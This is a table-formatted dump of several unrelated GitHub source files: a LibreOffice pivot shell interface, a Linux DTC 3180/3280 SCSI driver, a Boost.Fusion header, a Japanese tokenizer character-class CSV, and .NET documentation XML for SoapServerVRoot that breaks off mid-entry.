text
stringlengths 2
100k
| meta
dict |
---|---|
/*
* This file is part of the LibreOffice project.
*
* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/.
*
* This file incorporates work covered by the following license notice:
*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed
* with this work for additional information regarding copyright
* ownership. The ASF licenses this file to you under the Apache
* License, Version 2.0 (the "License"); you may not use this file
* except in compliance with the License. You may obtain a copy of
* the License at http://www.apache.org/licenses/LICENSE-2.0 .
*/
interface Pivot
{
SID_PIVOT_RECALC [ ExecMethod = Execute; StateMethod = GetState; ]
SID_PIVOT_KILL [ ExecMethod = Execute; StateMethod = GetState; ]
SID_DP_FILTER [ ExecMethod = Execute; StateMethod = GetState; ]
}
shell ScPivotShell
{
import Pivot;
}
| {
"pile_set_name": "Github"
} |
#define AUTOSENSE
#define PSEUDO_DMA
#define DONT_USE_INTR
#define UNSAFE /* Leave interrupts enabled during pseudo-dma I/O */
#define xNDEBUG (NDEBUG_INTR+NDEBUG_RESELECTION+\
NDEBUG_SELECTION+NDEBUG_ARBITRATION)
#define DMA_WORKS_RIGHT
/*
* DTC 3180/3280 driver, by
* Ray Van Tassle [email protected]
*
* taken from ...
* Trantor T128/T128F/T228 driver by...
*
* Drew Eckhardt
* Visionary Computing
* (Unix and Linux consulting and custom programming)
* [email protected]
* +1 (303) 440-4894
*
* DISTRIBUTION RELEASE 1.
*
* For more information, please consult
*
* NCR 5380 Family
* SCSI Protocol Controller
* Databook
*/
/*
* Options :
* AUTOSENSE - if defined, REQUEST SENSE will be performed automatically
* for commands that return with a CHECK CONDITION status.
*
* PSEUDO_DMA - enables PSEUDO-DMA hardware, should give a 3-4X performance
* increase compared to polled I/O.
*
* PARITY - enable parity checking. Not supported.
*
* UNSAFE - leave interrupts enabled during pseudo-DMA transfers.
* You probably want this.
*
* The card is detected and initialized in one of several ways :
* 1. Autoprobe (default) - since the board is memory mapped,
* a BIOS signature is scanned for to locate the registers.
* An interrupt is triggered to autoprobe for the interrupt
* line.
*
* 2. With command line overrides - dtc=address,irq may be
* used on the LILO command line to override the defaults.
*
*/
/*----------------------------------------------------------------*/
/* the following will set the monitor border color (useful to find
where something crashed or gets stuck at */
/* 1 = blue
2 = green
3 = cyan
4 = red
5 = magenta
6 = yellow
7 = white
*/
#if 0
#define rtrc(i) {inb(0x3da); outb(0x31, 0x3c0); outb((i), 0x3c0);}
#else
#define rtrc(i) {}
#endif
#include <linux/module.h>
#include <linux/signal.h>
#include <linux/blkdev.h>
#include <linux/delay.h>
#include <linux/stat.h>
#include <linux/string.h>
#include <linux/init.h>
#include <linux/interrupt.h>
#include <linux/io.h>
#include "scsi.h"
#include <scsi/scsi_host.h>
#include "dtc.h"
#define AUTOPROBE_IRQ
#include "NCR5380.h"
#define DTC_PUBLIC_RELEASE 2
/*
* The DTC3180 & 3280 boards are memory mapped.
*
*/
/*
*/
/* Offset from DTC_5380_OFFSET */
#define DTC_CONTROL_REG 0x100 /* rw */
#define D_CR_ACCESS 0x80 /* ro set=can access 3280 registers */
#define CSR_DIR_READ 0x40 /* rw direction, 1 = read 0 = write */
#define CSR_RESET 0x80 /* wo Resets 53c400 */
#define CSR_5380_REG 0x80 /* ro 5380 registers can be accessed */
#define CSR_TRANS_DIR 0x40 /* rw Data transfer direction */
#define CSR_SCSI_BUFF_INTR 0x20 /* rw Enable int on transfer ready */
#define CSR_5380_INTR 0x10 /* rw Enable 5380 interrupts */
#define CSR_SHARED_INTR 0x08 /* rw Interrupt sharing */
#define CSR_HOST_BUF_NOT_RDY 0x04 /* ro Host buffer not ready */
#define CSR_SCSI_BUF_RDY 0x02 /* ro SCSI buffer ready */
#define CSR_GATED_5380_IRQ 0x01 /* ro Last block xferred */
#define CSR_INT_BASE (CSR_SCSI_BUFF_INTR | CSR_5380_INTR)
#define DTC_BLK_CNT 0x101 /* rw
* # of 128-byte blocks to transfer */
#define D_CR_ACCESS 0x80 /* ro set=can access 3280 registers */
#define DTC_SWITCH_REG 0x3982 /* ro - DIP switches */
#define DTC_RESUME_XFER 0x3982 /* wo - resume data xfer
* after disconnect/reconnect*/
#define DTC_5380_OFFSET 0x3880 /* 8 registers here, see NCR5380.h */
/*!!!! for dtc, it's a 128 byte buffer at 3900 !!! */
#define DTC_DATA_BUF 0x3900 /* rw 128 bytes long */
static struct override {
unsigned int address;
int irq;
} overrides
#ifdef OVERRIDE
[] __initdata = OVERRIDE;
#else
[4] __initdata = {
{ 0, IRQ_AUTO }, { 0, IRQ_AUTO }, { 0, IRQ_AUTO }, { 0, IRQ_AUTO }
};
#endif
#define NO_OVERRIDES ARRAY_SIZE(overrides)
static struct base {
unsigned long address;
int noauto;
} bases[] __initdata = {
{ 0xcc000, 0 },
{ 0xc8000, 0 },
{ 0xdc000, 0 },
{ 0xd8000, 0 }
};
#define NO_BASES ARRAY_SIZE(bases)
static const struct signature {
const char *string;
int offset;
} signatures[] = {
{"DATA TECHNOLOGY CORPORATION BIOS", 0x25},
};
#define NO_SIGNATURES ARRAY_SIZE(signatures)
#ifndef MODULE
/*
* Function : dtc_setup(char *str, int *ints)
*
* Purpose : LILO command line initialization of the overrides array,
*
* Inputs : str - unused, ints - array of integer parameters with ints[0]
* equal to the number of ints.
*
*/
static void __init dtc_setup(char *str, int *ints)
{
static int commandline_current = 0;
int i;
if (ints[0] != 2)
printk("dtc_setup: usage dtc=address,irq\n");
else if (commandline_current < NO_OVERRIDES) {
overrides[commandline_current].address = ints[1];
overrides[commandline_current].irq = ints[2];
for (i = 0; i < NO_BASES; ++i)
if (bases[i].address == ints[1]) {
bases[i].noauto = 1;
break;
}
++commandline_current;
}
}
#endif
/*
* Function : int dtc_detect(struct scsi_host_template * tpnt)
*
* Purpose : detects and initializes DTC 3180/3280 controllers
* that were autoprobed, overridden on the LILO command line,
* or specified at compile time.
*
* Inputs : tpnt - template for this SCSI adapter.
*
* Returns : 1 if a host adapter was found, 0 if not.
*
*/
static int __init dtc_detect(struct scsi_host_template * tpnt)
{
static int current_override = 0, current_base = 0;
struct Scsi_Host *instance;
unsigned int addr;
void __iomem *base;
int sig, count;
tpnt->proc_name = "dtc3x80";
tpnt->proc_info = &dtc_proc_info;
for (count = 0; current_override < NO_OVERRIDES; ++current_override) {
addr = 0;
base = NULL;
if (overrides[current_override].address) {
addr = overrides[current_override].address;
base = ioremap(addr, 0x2000);
if (!base)
addr = 0;
} else
for (; !addr && (current_base < NO_BASES); ++current_base) {
#if (DTCDEBUG & DTCDEBUG_INIT)
printk(KERN_DEBUG "scsi-dtc : probing address %08x\n", bases[current_base].address);
#endif
if (bases[current_base].noauto)
continue;
base = ioremap(bases[current_base].address, 0x2000);
if (!base)
continue;
for (sig = 0; sig < NO_SIGNATURES; ++sig) {
if (check_signature(base + signatures[sig].offset, signatures[sig].string, strlen(signatures[sig].string))) {
addr = bases[current_base].address;
#if (DTCDEBUG & DTCDEBUG_INIT)
printk(KERN_DEBUG "scsi-dtc : detected board.\n");
#endif
goto found;
}
}
iounmap(base);
}
#if defined(DTCDEBUG) && (DTCDEBUG & DTCDEBUG_INIT)
printk(KERN_DEBUG "scsi-dtc : base = %08x\n", addr);
#endif
if (!addr)
break;
found:
instance = scsi_register(tpnt, sizeof(struct NCR5380_hostdata));
if (instance == NULL)
break;
instance->base = addr;
((struct NCR5380_hostdata *)(instance)->hostdata)->base = base;
NCR5380_init(instance, 0);
NCR5380_write(DTC_CONTROL_REG, CSR_5380_INTR); /* Enable int's */
if (overrides[current_override].irq != IRQ_AUTO)
instance->irq = overrides[current_override].irq;
else
instance->irq = NCR5380_probe_irq(instance, DTC_IRQS);
#ifndef DONT_USE_INTR
/* With interrupts enabled, it will sometimes hang when doing heavy
* reads. So better not enable them until I finger it out. */
if (instance->irq != SCSI_IRQ_NONE)
if (request_irq(instance->irq, dtc_intr, IRQF_DISABLED,
"dtc", instance)) {
printk(KERN_ERR "scsi%d : IRQ%d not free, interrupts disabled\n", instance->host_no, instance->irq);
instance->irq = SCSI_IRQ_NONE;
}
if (instance->irq == SCSI_IRQ_NONE) {
printk(KERN_WARNING "scsi%d : interrupts not enabled. for better interactive performance,\n", instance->host_no);
printk(KERN_WARNING "scsi%d : please jumper the board for a free IRQ.\n", instance->host_no);
}
#else
if (instance->irq != SCSI_IRQ_NONE)
printk(KERN_WARNING "scsi%d : interrupts not used. Might as well not jumper it.\n", instance->host_no);
instance->irq = SCSI_IRQ_NONE;
#endif
#if defined(DTCDEBUG) && (DTCDEBUG & DTCDEBUG_INIT)
printk("scsi%d : irq = %d\n", instance->host_no, instance->irq);
#endif
printk(KERN_INFO "scsi%d : at 0x%05X", instance->host_no, (int) instance->base);
if (instance->irq == SCSI_IRQ_NONE)
printk(" interrupts disabled");
else
printk(" irq %d", instance->irq);
printk(" options CAN_QUEUE=%d CMD_PER_LUN=%d release=%d", CAN_QUEUE, CMD_PER_LUN, DTC_PUBLIC_RELEASE);
NCR5380_print_options(instance);
printk("\n");
++current_override;
++count;
}
return count;
}
/*
* Function : int dtc_biosparam(Disk * disk, struct block_device *dev, int *ip)
*
* Purpose : Generates a BIOS / DOS compatible H-C-S mapping for
* the specified device / size.
*
* Inputs : size = size of device in sectors (512 bytes), dev = block device
* major / minor, ip[] = {heads, sectors, cylinders}
*
* Returns : always 0 (success), initializes ip
*
*/
/*
* XXX Most SCSI boards use this mapping, I could be incorrect. Some one
* using hard disks on a trantor should verify that this mapping corresponds
* to that used by the BIOS / ASPI driver by running the linux fdisk program
* and matching the H_C_S coordinates to what DOS uses.
*/
static int dtc_biosparam(struct scsi_device *sdev, struct block_device *dev,
sector_t capacity, int *ip)
{
int size = capacity;
ip[0] = 64;
ip[1] = 32;
ip[2] = size >> 11;
return 0;
}
/****************************************************************
* Function : int NCR5380_pread (struct Scsi_Host *instance,
* unsigned char *dst, int len)
*
* Purpose : Fast 5380 pseudo-dma read function, reads len bytes to
* dst
*
* Inputs : dst = destination, len = length in bytes
*
* Returns : 0 on success, non zero on a failure such as a watchdog
* timeout.
*/
static int dtc_maxi = 0;
static int dtc_wmaxi = 0;
static inline int NCR5380_pread(struct Scsi_Host *instance, unsigned char *dst, int len)
{
unsigned char *d = dst;
int i; /* For counting time spent in the poll-loop */
NCR5380_local_declare();
NCR5380_setup(instance);
i = 0;
NCR5380_read(RESET_PARITY_INTERRUPT_REG);
NCR5380_write(MODE_REG, MR_ENABLE_EOP_INTR | MR_DMA_MODE);
if (instance->irq == SCSI_IRQ_NONE)
NCR5380_write(DTC_CONTROL_REG, CSR_DIR_READ);
else
NCR5380_write(DTC_CONTROL_REG, CSR_DIR_READ | CSR_INT_BASE);
NCR5380_write(DTC_BLK_CNT, len >> 7); /* Block count */
rtrc(1);
while (len > 0) {
rtrc(2);
while (NCR5380_read(DTC_CONTROL_REG) & CSR_HOST_BUF_NOT_RDY)
++i;
rtrc(3);
memcpy_fromio(d, base + DTC_DATA_BUF, 128);
d += 128;
len -= 128;
rtrc(7);
/*** with int's on, it sometimes hangs after here.
* Looks like something makes HBNR go away. */
}
rtrc(4);
while (!(NCR5380_read(DTC_CONTROL_REG) & D_CR_ACCESS))
++i;
NCR5380_write(MODE_REG, 0); /* Clear the operating mode */
rtrc(0);
NCR5380_read(RESET_PARITY_INTERRUPT_REG);
if (i > dtc_maxi)
dtc_maxi = i;
return (0);
}
/****************************************************************
* Function : int NCR5380_pwrite (struct Scsi_Host *instance,
* unsigned char *src, int len)
*
* Purpose : Fast 5380 pseudo-dma write function, transfers len bytes from
* src
*
* Inputs : src = source, len = length in bytes
*
* Returns : 0 on success, non zero on a failure such as a watchdog
* timeout.
*/
static inline int NCR5380_pwrite(struct Scsi_Host *instance, unsigned char *src, int len)
{
int i;
NCR5380_local_declare();
NCR5380_setup(instance);
NCR5380_read(RESET_PARITY_INTERRUPT_REG);
NCR5380_write(MODE_REG, MR_ENABLE_EOP_INTR | MR_DMA_MODE);
/* set direction (write) */
if (instance->irq == SCSI_IRQ_NONE)
NCR5380_write(DTC_CONTROL_REG, 0);
else
NCR5380_write(DTC_CONTROL_REG, CSR_5380_INTR);
NCR5380_write(DTC_BLK_CNT, len >> 7); /* Block count */
for (i = 0; len > 0; ++i) {
rtrc(5);
/* Poll until the host buffer can accept data. */
while (NCR5380_read(DTC_CONTROL_REG) & CSR_HOST_BUF_NOT_RDY)
++i;
rtrc(3);
memcpy_toio(base + DTC_DATA_BUF, src, 128);
src += 128;
len -= 128;
}
rtrc(4);
while (!(NCR5380_read(DTC_CONTROL_REG) & D_CR_ACCESS))
++i;
rtrc(6);
/* Wait until the last byte has been sent to the disk */
while (!(NCR5380_read(TARGET_COMMAND_REG) & TCR_LAST_BYTE_SENT))
++i;
rtrc(7);
/* Check for parity error here. fixme. */
NCR5380_write(MODE_REG, 0); /* Clear the operating mode */
rtrc(0);
if (i > dtc_wmaxi)
dtc_wmaxi = i;
return (0);
}
MODULE_LICENSE("GPL");
#include "NCR5380.c"
static int dtc_release(struct Scsi_Host *shost)
{
NCR5380_local_declare();
NCR5380_setup(shost);
if (shost->irq)
free_irq(shost->irq, shost);
NCR5380_exit(shost);
if (shost->io_port && shost->n_io_port)
release_region(shost->io_port, shost->n_io_port);
scsi_unregister(shost);
iounmap(base);
return 0;
}
static struct scsi_host_template driver_template = {
.name = "DTC 3180/3280 ",
.detect = dtc_detect,
.release = dtc_release,
.queuecommand = dtc_queue_command,
.eh_abort_handler = dtc_abort,
.eh_bus_reset_handler = dtc_bus_reset,
.bios_param = dtc_biosparam,
.can_queue = CAN_QUEUE,
.this_id = 7,
.sg_tablesize = SG_ALL,
.cmd_per_lun = CMD_PER_LUN,
.use_clustering = DISABLE_CLUSTERING,
};
#include "scsi_module.c"
| {
"pile_set_name": "Github"
} |
/*=============================================================================
Copyright (c) 2001-2013 Joel de Guzman
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.lslboost.org/LICENSE_1_0.txt)
==============================================================================*/
#if !defined(FUSION_MAKE_DEQUE_01272013_1401)
#define FUSION_MAKE_DEQUE_01272013_1401
#include <lslboost/fusion/container/deque/deque.hpp>
#if !defined(BOOST_FUSION_HAS_VARIADIC_DEQUE)
# include <lslboost/fusion/container/generation/detail/pp_make_deque.hpp>
#else
///////////////////////////////////////////////////////////////////////////////
// C++11 variadic interface
///////////////////////////////////////////////////////////////////////////////
#include <lslboost/fusion/support/detail/as_fusion_element.hpp>
namespace lslboost { namespace fusion
{
namespace result_of
{
template <typename ...T>
struct make_deque
{
typedef deque<T...> type;
};
}
template <typename ...T>
inline deque<typename detail::as_fusion_element<T>::type...>
make_deque(T const&... arg)
{
return deque<typename detail::as_fusion_element<T>::type...>(arg...);
}
}}
#endif
#endif
| {
"pile_set_name": "Github"
} |
DEFAULT,5968,5968,3857,補助記号,一般,*,*,*,*
SPACE,5966,5966,6056,空白,*,*,*,*,*
KANJI,5139,5139,14657,名詞,普通名詞,一般,*,*,*
KANJI,5129,5129,17308,名詞,普通名詞,サ変可能,*,*,*
KANJI,4785,4785,18181,名詞,固有名詞,一般,*,*,*
KANJI,4787,4787,18086,名詞,固有名詞,人名,一般,*,*
KANJI,4791,4791,19198,名詞,固有名詞,地名,一般,*,*
SYMBOL,5129,5129,17094,名詞,普通名詞,サ変可能,*,*,*
NUMERIC,4794,4794,12450,名詞,数詞,*,*,*,*
ALPHA,5139,5139,11633,名詞,普通名詞,一般,*,*,*
ALPHA,4785,4785,13620,名詞,固有名詞,一般,*,*,*
ALPHA,4787,4787,14228,名詞,固有名詞,人名,一般,*,*
ALPHA,4791,4791,15793,名詞,固有名詞,地名,一般,*,*
ALPHA,5687,5687,15246,感動詞,一般,*,*,*,*
HIRAGANA,5139,5139,16012,名詞,普通名詞,一般,*,*,*
HIRAGANA,5129,5129,20012,名詞,普通名詞,サ変可能,*,*,*
HIRAGANA,4785,4785,18282,名詞,固有名詞,一般,*,*,*
HIRAGANA,4787,4787,18269,名詞,固有名詞,人名,一般,*,*
HIRAGANA,4791,4791,20474,名詞,固有名詞,地名,一般,*,*
HIRAGANA,5687,5687,17786,感動詞,一般,*,*,*,*
KATAKANA,5139,5139,10980,名詞,普通名詞,一般,*,*,*
KATAKANA,5129,5129,14802,名詞,普通名詞,サ変可能,*,*,*
KATAKANA,4785,4785,13451,名詞,固有名詞,一般,*,*,*
KATAKANA,4787,4787,13759,名詞,固有名詞,人名,一般,*,*
KATAKANA,4791,4791,14554,名詞,固有名詞,地名,一般,*,*
KATAKANA,5687,5687,15272,感動詞,一般,*,*,*,*
KANJINUMERIC,4794,4794,14170,名詞,数詞,*,*,*,*
GREEK,5139,5139,11051,名詞,普通名詞,一般,*,*,*
GREEK,4785,4785,13353,名詞,固有名詞,一般,*,*,*
GREEK,4787,4787,13671,名詞,固有名詞,人名,一般,*,*
GREEK,4791,4791,14862,名詞,固有名詞,地名,一般,*,*
CYRILLIC,5139,5139,11140,名詞,普通名詞,一般,*,*,*
CYRILLIC,4785,4785,13174,名詞,固有名詞,一般,*,*,*
CYRILLIC,4787,4787,13495,名詞,固有名詞,人名,一般,*,*
CYRILLIC,4791,4791,14700,名詞,固有名詞,地名,一般,*,*
| {
"pile_set_name": "Github"
} |
<Type Name="SoapServerVRoot" FullName="System.EnterpriseServices.Internal.SoapServerVRoot">
<TypeSignature Language="C#" Value="public sealed class SoapServerVRoot : System.EnterpriseServices.Internal.ISoapServerVRoot" />
<TypeSignature Language="ILAsm" Value=".class public auto ansi sealed beforefieldinit SoapServerVRoot extends System.Object implements class System.EnterpriseServices.Internal.ISoapServerVRoot" />
<TypeSignature Language="DocId" Value="T:System.EnterpriseServices.Internal.SoapServerVRoot" />
<TypeSignature Language="VB.NET" Value="Public NotInheritable Class SoapServerVRoot
Implements ISoapServerVRoot" />
<TypeSignature Language="C++ CLI" Value="public ref class SoapServerVRoot sealed : System::EnterpriseServices::Internal::ISoapServerVRoot" />
<TypeSignature Language="F#" Value="type SoapServerVRoot = class
 interface ISoapServerVRoot" />
<AssemblyInfo>
<AssemblyName>System.EnterpriseServices</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Base>
<BaseTypeName>System.Object</BaseTypeName>
</Base>
<Interfaces>
<Interface>
<InterfaceName>System.EnterpriseServices.Internal.ISoapServerVRoot</InterfaceName>
</Interface>
</Interfaces>
<Attributes>
<Attribute>
<AttributeName Language="C#">[System.Runtime.InteropServices.Guid("CAA817CC-0C04-4d22-A05C-2B7E162F4E8F")]</AttributeName>
<AttributeName Language="F#">[<System.Runtime.InteropServices.Guid("CAA817CC-0C04-4d22-A05C-2B7E162F4E8F")>]</AttributeName>
</Attribute>
</Attributes>
<Docs>
<summary>Publishes authenticated, encrypted SOAP virtual roots on servers. This class cannot be inherited.</summary>
<remarks>
<format type="text/markdown"><![CDATA[
## Remarks
<xref:System.EnterpriseServices.Internal.SoapServerVRoot> is used internally by the .NET Framework. You do not need to use it directly in your code.
]]></format>
</remarks>
</Docs>
<Members>
<Member MemberName=".ctor">
<MemberSignature Language="C#" Value="public SoapServerVRoot ();" />
<MemberSignature Language="ILAsm" Value=".method public hidebysig specialname rtspecialname instance void .ctor() cil managed" />
<MemberSignature Language="DocId" Value="M:System.EnterpriseServices.Internal.SoapServerVRoot.#ctor" />
<MemberSignature Language="VB.NET" Value="Public Sub New ()" />
<MemberSignature Language="C++ CLI" Value="public:
 SoapServerVRoot();" />
<MemberType>Constructor</MemberType>
<AssemblyInfo>
<AssemblyName>System.EnterpriseServices</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Parameters />
<Docs>
<summary>Initializes a new instance of the <see cref="T:System.EnterpriseServices.Internal.SoapServerVRoot" /> class.</summary>
<remarks>To be added.</remarks>
</Docs>
</Member>
<Member MemberName="CreateVirtualRootEx">
<MemberSignature Language="C#" Value="public void CreateVirtualRootEx (string rootWebServer, string inBaseUrl, string inVirtualRoot, string homePage, string discoFile, string secureSockets, string authentication, string operation, out string baseUrl, out string virtualRoot, out string physicalPath);" />
<MemberSignature Language="ILAsm" Value=".method public hidebysig newslot virtual instance void CreateVirtualRootEx(string rootWebServer, string inBaseUrl, string inVirtualRoot, string homePage, string discoFile, string secureSockets, string authentication, string operation, [out] string& baseUrl, [out] string& virtualRoot, [out] string& physicalPath) cil managed" />
<MemberSignature Language="DocId" Value="M:System.EnterpriseServices.Internal.SoapServerVRoot.CreateVirtualRootEx(System.String,System.String,System.String,System.String,System.String,System.String,System.String,System.String,System.String@,System.String@,System.String@)" />
<MemberSignature Language="VB.NET" Value="Public Sub CreateVirtualRootEx (rootWebServer As String, inBaseUrl As String, inVirtualRoot As String, homePage As String, discoFile As String, secureSockets As String, authentication As String, operation As String, ByRef baseUrl As String, ByRef virtualRoot As String, ByRef physicalPath As String)" />
<MemberSignature Language="C++ CLI" Value="public:
 virtual void CreateVirtualRootEx(System::String ^ rootWebServer, System::String ^ inBaseUrl, System::String ^ inVirtualRoot, System::String ^ homePage, System::String ^ discoFile, System::String ^ secureSockets, System::String ^ authentication, System::String ^ operation, [Runtime::InteropServices::Out] System::String ^ % baseUrl, [Runtime::InteropServices::Out] System::String ^ % virtualRoot, [Runtime::InteropServices::Out] System::String ^ % physicalPath);" />
<MemberSignature Language="F#" Value="abstract member CreateVirtualRootEx : string * string * string * string * string * string * string * string * string * string * string -> unit
override this.CreateVirtualRootEx : string * string * string * string * string * string * string * string * string * string * string -> unit" Usage="soapServerVRoot.CreateVirtualRootEx (rootWebServer, inBaseUrl, inVirtualRoot, homePage, discoFile, secureSockets, authentication, operation, baseUrl, virtualRoot, physicalPath)" />
<MemberType>Method</MemberType>
<Implements>
<InterfaceMember>M:System.EnterpriseServices.Internal.ISoapServerVRoot.CreateVirtualRootEx(System.String,System.String,System.String,System.String,System.String,System.String,System.String,System.String,System.String@,System.String@,System.String@)</InterfaceMember>
</Implements>
<AssemblyInfo>
<AssemblyName>System.EnterpriseServices</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<ReturnValue>
<ReturnType>System.Void</ReturnType>
</ReturnValue>
<Parameters>
<Parameter Name="rootWebServer" Type="System.String" />
<Parameter Name="inBaseUrl" Type="System.String" />
<Parameter Name="inVirtualRoot" Type="System.String" />
<Parameter Name="homePage" Type="System.String" />
<Parameter Name="discoFile" Type="System.String" />
<Parameter Name="secureSockets" Type="System.String" />
<Parameter Name="authentication" Type="System.String" />
<Parameter Name="operation" Type="System.String" />
<Parameter Name="baseUrl" Type="System.String" RefType="out" />
<Parameter Name="virtualRoot" Type="System.String" RefType="out" />
<Parameter Name="physicalPath" Type="System.String" RefType="out" />
</Parameters>
<Docs>
<param name="rootWebServer">The root Web server. The default is "IIS://localhost/W3SVC/1/ROOT".</param>
<param name="inBaseUrl">The base URL that contains the virtual root.</param>
<param name="inVirtualRoot">The name of the virtual root.</param>
<param name="homePage">The URL of the home page.</param>
<param name="discoFile">
<see langword="true" /> if a default discovery file is to be created; <see langword="false" /> if there is to be no discovery file. If <see langword="false" /> and a Default.disco file exists, the file is deleted.</param>
<param name="secureSockets">
<see langword="true" /> if SSL encryption is required; otherwise, <see langword="false" />.</param>
<param name="authentication">Specify "anonymous" if no authentication is to be used (anonymous user). Otherwise, specify an empty string.</param>
<param name="operation">Not used. Specify <see langword="null" /> for this parameter.</param>
<param name="baseUrl">When this method returns, this parameter contains the base URL.</param>
<param name="virtualRoot">When this method returns, this parameter contains the name of the virtual root.</param>
<param name="physicalPath">When this method returns, this parameter contains the disk address of the Virtual Root directory.</param>
<summary>Creates a SOAP virtual root with security options.</summary>
<remarks>To be added.</remarks>
<exception cref="T:System.Security.SecurityException">A caller in the call chain does not have permission to access unmanaged code.</exception>
<exception cref="T:System.PlatformNotSupportedException">The SOAP utility is not available.</exception>
</Docs>
</Member>
<Member MemberName="DeleteVirtualRootEx">
<MemberSignature Language="C#" Value="public void DeleteVirtualRootEx (string rootWebServer, string inBaseUrl, string inVirtualRoot);" />
<MemberSignature Language="ILAsm" Value=".method public hidebysig newslot virtual instance void DeleteVirtualRootEx(string rootWebServer, string inBaseUrl, string inVirtualRoot) cil managed" />
<MemberSignature Language="DocId" Value="M:System.EnterpriseServices.Internal.SoapServerVRoot.DeleteVirtualRootEx(System.String,System.String,System.String)" />
<MemberSignature Language="VB.NET" Value="Public Sub DeleteVirtualRootEx (rootWebServer As String, inBaseUrl As String, inVirtualRoot As String)" />
<MemberSignature Language="C++ CLI" Value="public:
 virtual void DeleteVirtualRootEx(System::String ^ rootWebServer, System::String ^ inBaseUrl, System::String ^ inVirtualRoot);" />
<MemberSignature Language="F#" Value="abstract member DeleteVirtualRootEx : string * string * string -> unit
override this.DeleteVirtualRootEx : string * string * string -> unit" Usage="soapServerVRoot.DeleteVirtualRootEx (rootWebServer, inBaseUrl, inVirtualRoot)" />
<MemberType>Method</MemberType>
<Implements>
<InterfaceMember>M:System.EnterpriseServices.Internal.ISoapServerVRoot.DeleteVirtualRootEx(System.String,System.String,System.String)</InterfaceMember>
</Implements>
<AssemblyInfo>
<AssemblyName>System.EnterpriseServices</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<ReturnValue>
<ReturnType>System.Void</ReturnType>
</ReturnValue>
<Parameters>
<Parameter Name="rootWebServer" Type="System.String" />
<Parameter Name="inBaseUrl" Type="System.String" />
<Parameter Name="inVirtualRoot" Type="System.String" />
</Parameters>
<Docs>
<param name="rootWebServer">The root Web server. The default is "IIS://localhost/W3SVC/1/ROOT".</param>
<param name="inBaseUrl">The base URL that contains the virtual root.</param>
<param name="inVirtualRoot">The name of the virtual root.</param>
<summary>Deletes a virtual root. Not fully implemented.</summary>
<remarks>
<format type="text/markdown"><![CDATA[
## Remarks
The functionality to delete a virtual root is not yet available.
> [!CAUTION]
> This method returns without deleting the virtual root.
]]></format>
</remarks>
<exception cref="T:System.Security.SecurityException">A caller in the call chain does not have permission to access unmanaged code.</exception>
<exception cref="T:System.PlatformNotSupportedException">The SOAP utility is not available.</exception>
<exception cref="T:System.EnterpriseServices.ServicedComponentException">The call to get the system directory failed.</exception>
</Docs>
</Member>
<Member MemberName="GetVirtualRootStatus">
<MemberSignature Language="C#" Value="public void GetVirtualRootStatus (string RootWebServer, string inBaseUrl, string inVirtualRoot, out string Exists, out string SSL, out string WindowsAuth, out string Anonymous, out string HomePage, out string DiscoFile, out string PhysicalPath, out string BaseUrl, out string VirtualRoot);" />
<MemberSignature Language="ILAsm" Value=".method public hidebysig newslot virtual instance void GetVirtualRootStatus(string RootWebServer, string inBaseUrl, string inVirtualRoot, [out] string& Exists, [out] string& SSL, [out] string& WindowsAuth, [out] string& Anonymous, [out] string& HomePage, [out] string& DiscoFile, [out] string& PhysicalPath, [out] string& BaseUrl, [out] string& VirtualRoot) cil managed" />
<MemberSignature Language="DocId" Value="M:System.EnterpriseServices.Internal.SoapServerVRoot.GetVirtualRootStatus(System.String,System.String,System.String,System.String@,System.String@,System.String@,System.String@,System.String@,System.String@,System.String@,System.String@,System.String@)" />
<MemberSignature Language="VB.NET" Value="Public Sub GetVirtualRootStatus (RootWebServer As String, inBaseUrl As String, inVirtualRoot As String, ByRef Exists As String, ByRef SSL As String, ByRef WindowsAuth As String, ByRef Anonymous As String, ByRef HomePage As String, ByRef DiscoFile As String, ByRef PhysicalPath As String, ByRef BaseUrl As String, ByRef VirtualRoot As String)" />
<MemberSignature Language="C++ CLI" Value="public:
 virtual void GetVirtualRootStatus(System::String ^ RootWebServer, System::String ^ inBaseUrl, System::String ^ inVirtualRoot, [Runtime::InteropServices::Out] System::String ^ % Exists, [Runtime::InteropServices::Out] System::String ^ % SSL, [Runtime::InteropServices::Out] System::String ^ % WindowsAuth, [Runtime::InteropServices::Out] System::String ^ % Anonymous, [Runtime::InteropServices::Out] System::String ^ % HomePage, [Runtime::InteropServices::Out] System::String ^ % DiscoFile, [Runtime::InteropServices::Out] System::String ^ % PhysicalPath, [Runtime::InteropServices::Out] System::String ^ % BaseUrl, [Runtime::InteropServices::Out] System::String ^ % VirtualRoot);" />
<MemberSignature Language="F#" Value="abstract member GetVirtualRootStatus : string * string * string * string * string * string * string * string * string * string * string * string -> unit
override this.GetVirtualRootStatus : string * string * string * string * string * string * string * string * string * string * string * string -> unit" Usage="soapServerVRoot.GetVirtualRootStatus (RootWebServer, inBaseUrl, inVirtualRoot, Exists, SSL, WindowsAuth, Anonymous, HomePage, DiscoFile, PhysicalPath, BaseUrl, VirtualRoot)" />
<MemberType>Method</MemberType>
<Implements>
<InterfaceMember>M:System.EnterpriseServices.Internal.ISoapServerVRoot.GetVirtualRootStatus(System.String,System.String,System.String,System.String@,System.String@,System.String@,System.String@,System.String@,System.String@,System.String@,System.String@,System.String@)</InterfaceMember>
</Implements>
<AssemblyInfo>
<AssemblyName>System.EnterpriseServices</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<ReturnValue>
